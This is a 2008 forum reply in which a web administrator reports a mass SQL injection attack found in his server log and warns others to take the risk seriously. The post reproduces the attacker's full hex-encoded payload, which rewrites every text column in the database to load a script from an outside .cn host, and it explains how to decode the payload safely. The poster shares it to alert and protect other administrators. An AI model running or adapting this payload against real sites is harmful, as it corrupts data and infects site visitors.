Home Forums Article Discussions Article Discussions by Author Discuss content posted by GSquared A Hex on Your Database RE: A Hex on Your Database

  • June 16, 2008 at 2:18 am

    #829074

    I run a web server where the oldest pages date about 10 years of life, and are still in old .asp.

    Unfortunately I knew the answer very well. I had a bit of a nightmare last month, when I was checking my web server log and found some very strange entries like this:

    DO NOT RUN THIS CODE ON YOUR DB OR IT WILL BE DESTROYED

    2008-05-11 20:57:33 W3SVC2094917486 10.0.0.5 POST /Customer/Inklist.asp K=NITRO;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x44004500

    43004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800

    320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F0052002000

    46004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D002000730079007300

    6F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E0069006400

    3D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E007800740079007000

    65003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D00320033003100

    20006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00

    720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004900

    4E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900

    200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D0020007300650074002000

    5B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B002700

    2B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0063006F006D00

    700075007400650072007300680065006C006C006F002E0063006E002F0071002E006A0073003E003C002F007300630072006900700074003E002700270027002900

    4600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E005400

    4F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F007200200044004500

    41004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 8086 - 10.0.0.1 Mozilla/3.0+(compatible;+Indy+Library) 302 0 0

    (Please note I had to break the hex code adding carriage returns: you have to put that on a single line.

    If you want to examine the code:

    * Open a query window in SQL server;

    * Insert:

    DECLARE @s-2 NVARCHAR(4000);

    SET @s-2=CAST( and here add all the above hex on a sinle line [excluding the %20AS%20... of course] AS NVARCHAR(4000));

    * remove EXEC(@S); code!!!

    * add a SELECT @s-2; line at the end. )

    I had to re-examine all of those old .asp pages and see if they were vulnerable (fortunately not, but it probably was a matter of good luck - or good programming style - because at that time SQL injection was something nobody had ever heard of, or at least I didn't).

    A few weeks later, my firewall got the signature for this attack ("Danmec.Asprox.SQL.Injection") and now recognizes those trials blocking them before they reach IIS.

    Examining the code was really interesting to me, because I had never seen such a destructive code put into action. The attacker has some brain, and deep knowledge of the SQL server internals. I tried to follow the .cn site where the html script, injected in every row of every table of the db, points (now that site is down).

    A web page using data provided by an infected table, would have run a javascript downloaded by that computershello.cn site. This javascript would have opened an IFRAME pointing to other javascripts downloading content from several other web sites (most of them seemed to reside in China).

    Since then, my firewall reported dozen of those attacks every day.

    Scary, isn't it?

    Bottom line is: take SQL injection risk as a real menace. There are people out there who will try everything to destroy your work and your data, for some mysterious reason! (I hope this post doesn't give some of them some bad ideas, my purpose was the exact opposite.)